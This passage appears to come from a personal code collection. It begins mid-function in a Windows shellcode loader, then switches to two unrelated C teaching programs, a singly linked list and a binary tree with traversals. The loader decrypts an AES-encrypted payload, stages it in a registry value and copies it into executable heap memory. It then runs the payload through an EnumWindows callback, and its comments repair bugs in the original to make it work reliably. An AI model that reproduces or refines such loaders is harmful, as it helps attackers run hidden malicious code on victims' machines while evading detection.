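	char buf[BUF_SIZE] = "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";

	// Decrypt to the hex text form of the payload. The original copied
	// strbuf.length() bytes into a fixed char buff[BUF_SIZE] with no bound check.
	string strbuf = DecryptionAES(buf);
	if (strbuf.empty() || strbuf.length() >= BUF_SIZE)
	{
		printf("decrypted payload is empty or too large (%u chars)\n", (unsigned)strbuf.length());
		return 1;
	}

	// Hex text -> raw bytes, two characters per byte (an odd trailing nibble is
	// dropped, as before).
	SIZE_T bufSize = strbuf.length() / 2;
	unsigned char* shellcode = (unsigned char*)calloc(bufSize, sizeof(unsigned char));
	if (shellcode == NULL)
	{
		printf("calloc failed\n");
		return 1;
	}
	const char* p = strbuf.c_str();
	for (SIZE_T i = 0; i < bufSize; i++)
	{
		sscanf(p, "%2hhx", &shellcode[i]);
		p += 2;
	}

	printf("Decrypted buffer:\n");
	for (SIZE_T i = 0; i < bufSize; i++)
	{
		printf("\\x%02x", shellcode[i]);
	}

	// Stage the payload through the registry: write it as a REG_BINARY value
	// at the root of HKEY_CURRENT_USER (the original's magic 3 is REG_BINARY),
	// then read it straight back into executable heap memory.
	// Artifact note for responders: the value "HelloTest" is left in HKCU.
	LSTATUS a = RegSetValueExA(rootKey, "HelloTest", 0, REG_BINARY, shellcode, (DWORD)bufSize);
	if (a != ERROR_SUCCESS)
	{
		printf("RegSetValueExA failed: %ld\n", a);
		free(shellcode);
		return 1;
	}

	// Size query first (lpData == NULL) so the buffer can be allocated to fit.
	// The original allocated 0 bytes and then let RegQueryValueExA write cbData
	// bytes into it -- a heap overflow.
	LSTATUS b = RegQueryValueExA(rootKey, "HelloTest", 0, 0, 0, &cbData);
	if (b != ERROR_SUCCESS || cbData == 0)
	{
		printf("RegQueryValueExA (size) failed: %ld\n", b);
		free(shellcode);
		return 1;
	}

	HANDLE HeapHandle = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
	if (HeapHandle == NULL)
	{
		printf("HeapCreate failed: %lu\n", GetLastError());
		free(shellcode);
		return 1;
	}
	BYTE* exec = (BYTE*)HeapAlloc(HeapHandle, HEAP_ZERO_MEMORY, cbData);
	if (exec == NULL)
	{
		printf("HeapAlloc failed\n");
		HeapDestroy(HeapHandle);
		free(shellcode);
		return 1;
	}

	LSTATUS c = RegQueryValueExA(rootKey, "HelloTest", 0, 0, exec, &cbData);
	if (c == ERROR_SUCCESS)
	{
		// Execution via a callback-taking API: EnumWindows calls exec as its
		// WNDENUMPROC (the EnumWindowCallback stub above is not used).
		EnumWindows((WNDENUMPROC)exec, NULL);
	}

	// exec is heap memory, not a kernel object: the original's CloseHandle(exec)
	// passed an invalid handle. Free it through the heap that owns it.
	HeapFree(HeapHandle, 0, exec);
	HeapDestroy(HeapHandle);
	free(shellcode);
	return 0;
}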

c-单链表

// Singly linked list node: one int payload plus the link to the next node.
typedef struct node {
    int data; // payload
    struct node *next;  // next node, NULL at the tail
} node;

// List header: element count plus the link to the first node.
typedef struct list {
    int size; // number of nodes currently in the chain
    struct node *next; // first node, NULL when the list is empty
} list;


/* Allocate an empty list header (size 0, no nodes). Prints "mem error" and
 * returns NULL when malloc fails. The caller owns the returned header. */
list *crete_list() {
    list *head = malloc(sizeof *head);
    if (!head) {
        printf("mem error");
        return NULL;
    }
    head->size = 0;
    head->next = NULL;
    return head;
}


/* Allocate a detached node with data 0 and no successor. Prints "mem error"
 * and returns NULL when malloc fails. */
node *crate_node() {
    node *fresh = malloc(sizeof *fresh);
    if (!fresh) {
        printf("mem error");
        return NULL;
    }
    fresh->data = 0;
    fresh->next = NULL;
    return fresh;
}

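// Head insert

/* Insert data as the new first element of list.
 * Returns 0 on success and -1 when the node could not be allocated (the list
 * is left unchanged). The original was declared int but returned the list
 * pointer -- a truncating pointer-to-int conversion on 64-bit targets -- and
 * dereferenced crate_node()'s result without checking it. */
int head_add(list *list, int data) {
    node *new_node = crate_node();
    if (!new_node) {
        return -1;
    }

    new_node->data = data;
    new_node->next = list->next;   /* old head becomes the successor */
    list->next = new_node;
    list->size++;

    return 0;
}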

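// Tail insert
/* Append data after the last element of list (O(n) walk to the tail).
 * Returns 0 on success and -1 when the node could not be allocated (the list
 * is left unchanged). The original was declared int but returned the list
 * pointer and never checked crate_node(). */
int tail_add(list *list, int data) {
    node *new_node = crate_node();
    if (!new_node) {
        return -1;
    }
    new_node->data = data;

    /* Walk to the pointer that is currently NULL: list->next for an empty
     * list, otherwise the last node's next. Writing through it appends. */
    node **link = &list->next;
    while (*link) {
        link = &(*link)->next;
    }
    *link = new_node;

    list->size++;

    return 0;
}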

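// Insert
// Inserting at position i means finding the pointer that currently leads to
// element i (the header's next for i == 0, otherwise element i-1's next),
// pointing it at the new node, and pointing the new node at the old element i.

/* Insert data so that it becomes element number pos (0 = new head,
 * list->size = append). Returns list on success; returns NULL, leaving the
 * list unchanged, when pos is outside 0..list->size or the node could not be
 * allocated. The original walked the chain by casting the list header to
 * node * (type punning on matching layout) and had no bound check, so any
 * pos > size dereferenced NULL. */
list *list_insert(list *list, int data, int pos) {
    if (pos < 0 || pos > list->size) {
        return NULL;
    }

    /* Address of the link to patch; after pos hops it points at the
     * predecessor's next (or the header's next when pos == 0). Every hop
     * stays in bounds because pos <= size. */
    node **link = &list->next;
    for (int i = 0; i < pos; i++) {
        link = &(*link)->next;
    }

    node *new_node = crate_node();
    if (!new_node) {
        return NULL;
    }
    new_node->data = data;

    new_node->next = *link;
    *link = new_node;

    list->size++;
    return list;
}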

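// Delete by position

/* Remove and free element number pos (0 = head). Returns list on success;
 * returns NULL and leaves the list unchanged when pos is outside
 * 0..list->size-1. The original cast the list header to node * to start the
 * walk and had no bound check, so pos >= size dereferenced NULL. */
list *list_del(list *list, int pos) {
    if (pos < 0 || pos >= list->size) {
        return NULL;
    }

    /* Address of the link that points at element pos; pos < size keeps
     * every hop in bounds. */
    node **link = &list->next;
    for (int i = 0; i < pos; i++) {
        link = &(*link)->next;
    }

    node *victim = *link;
    *link = victim->next;   /* unlink, then release */
    free(victim);
    list->size--;
    return list;
}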

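// Delete by value

/* Remove and free the first element whose data equals data. Returns list on
 * success and NULL, leaving the list unchanged, when no element matches.
 * The original left its predecessor pointer uninitialised when the head
 * matched (writing through garbage) and dereferenced NULL when the value was
 * absent. */
list *list_vul_del(list *list, int data) {
    /* Walk the links themselves so the head needs no special case. */
    node **link = &list->next;
    while (*link && (*link)->data != data) {
        link = &(*link)->next;
    }
    if (!*link) {
        return NULL;   /* not found */
    }

    node *victim = *link;
    *link = victim->next;
    free(victim);
    list->size--;
    return list;
}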


/* Print the element count, then every value from head to tail, one per line. */
void print_list(list *list) {
    printf("len: %d\n", list->size);

    int index = 0;
    for (node *p = list->next; p != NULL; p = p->next) {
        printf("第%d个元素的值为:%d\n", ++index, p->data);
    }
}


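/* Free every node and then the header. Safe to call with NULL. */
static void list_free(list *l) {
    if (!l) {
        return;
    }
    node *p = l->next;
    while (p) {
        node *next = p->next;
        free(p);
        p = next;
    }
    free(l);
}

/* Exercise the list: the sequence below leaves [10, 1, 100, 111], so the
 * output is "len: 4" followed by those four values. */
int main() {
    list *l = crete_list();
    if (!l) {
        return 1;   /* crete_list already reported the allocation failure */
    }
    head_add(l, 1);
    head_add(l, 2);
    head_add(l, 10);
    tail_add(l, 100);
    tail_add(l, 111);
    list_insert(l, 520, 1);
    list_del(l, 2);
    list_vul_del(l, 520);
    print_list(l);

    list_free(l);   /* the original leaked the whole list at exit */
    return 0;
}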

c-二叉树

#include <stdlib.h>
#include <stdio.h>
/* Binary tree node: child pointers (NULL when the subtree is empty) and a
 * single-character key. */
typedef struct tree_node {
    /* left child, or NULL */
    struct tree_node *left;
    /* right child, or NULL */
    struct tree_node *right;
    /* key */
    char key;
}tree_node;
/* Allocate a leaf holding key (both children NULL). Returns NULL when malloc
 * fails. */
tree_node *tree_create_node(char key)
{
    tree_node *leaf = malloc(sizeof *leaf);
    if (!leaf) {
        return NULL;
    }
    leaf->left = leaf->right = NULL;
    leaf->key = key;
    return leaf;
}
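/* Build a tree from a pre-order listing on stdin: one character per node,
 * '#' for an empty subtree, e.g. ABD##E##CF##G##. Because "%c" does not skip
 * whitespace, a blank or newline is read as a key, so the input must contain
 * none before the tree is complete.
 * Returns NULL for an empty subtree, at EOF / read error, or when a node
 * cannot be allocated (in that case the remaining input is left unread and
 * the tree is truncated there). The original ignored scanf's result, so EOF
 * recursed forever on an uninitialised char, and never checked the
 * allocation. */
tree_node *tree_create()
{
    char str;
    if (scanf("%c", &str) != 1) {
        return NULL;   /* EOF or read error ends the subtree */
    }
    // input ABD##E##CF##G##
    if ('#' == str) {
        return NULL;
    }

    tree_node *current = tree_create_node(str);
    if (current == NULL) {
        return NULL;
    }
    current->left = tree_create();
    current->right = tree_create();
    return current;
}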

/* Pre-order traversal: print node, then left subtree, then right subtree.
 * Each key is followed by a tab. No-op on NULL. */
void preorder_traverse1(tree_node *node)
{
    if (node == NULL) {
        return;
    }
    printf("%c\t", node->key);
    preorder_traverse1(node->left);
    preorder_traverse1(node->right);
}

/* In-order traversal: left subtree, then node, then right subtree.
 * Each key is followed by a tab. No-op on NULL. */
void inorder_traverse1(tree_node *node)
{
    if (node == NULL) {
        return;
    }
    inorder_traverse1(node->left);
    printf("%c\t", node->key);
    inorder_traverse1(node->right);
}

/* Post-order traversal: left subtree, then right subtree, then node.
 * Each key is followed by a tab. No-op on NULL. */
void postorder_traverse1(tree_node *node)
{
    if (node == NULL) {
        return;
    }
    postorder_traverse1(node->left);
    postorder_traverse1(node->right);
    printf("%c\t", node->key);
}

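/* Release a tree post-order (children before parent). Safe on NULL. */
static void tree_free(tree_node *node)
{
    if (node == NULL) {
        return;
    }
    tree_free(node->left);
    tree_free(node->right);
    free(node);
}

/* Read a tree from stdin and print its three traversals.
 * For the sample input ABD##E##CF##G## the tree is A(B(D,E), C(F,G)), so the
 * output is pre-order A B D E C F G, in-order D B E A F C G and post-order
 * D E B F G C A. */
int main() {

    /* ABD##E##CF##G## */
    tree_node *root = tree_create();

    printf("\n前序遍历1:");
    preorder_traverse1(root);

    printf("\n\n中序遍历1:");
    inorder_traverse1(root);

    printf("\n\n后序遍历1:");
    postorder_traverse1(root);

    printf("\n");

    tree_free(root);   /* the original leaked the tree at exit */
    return 0;
}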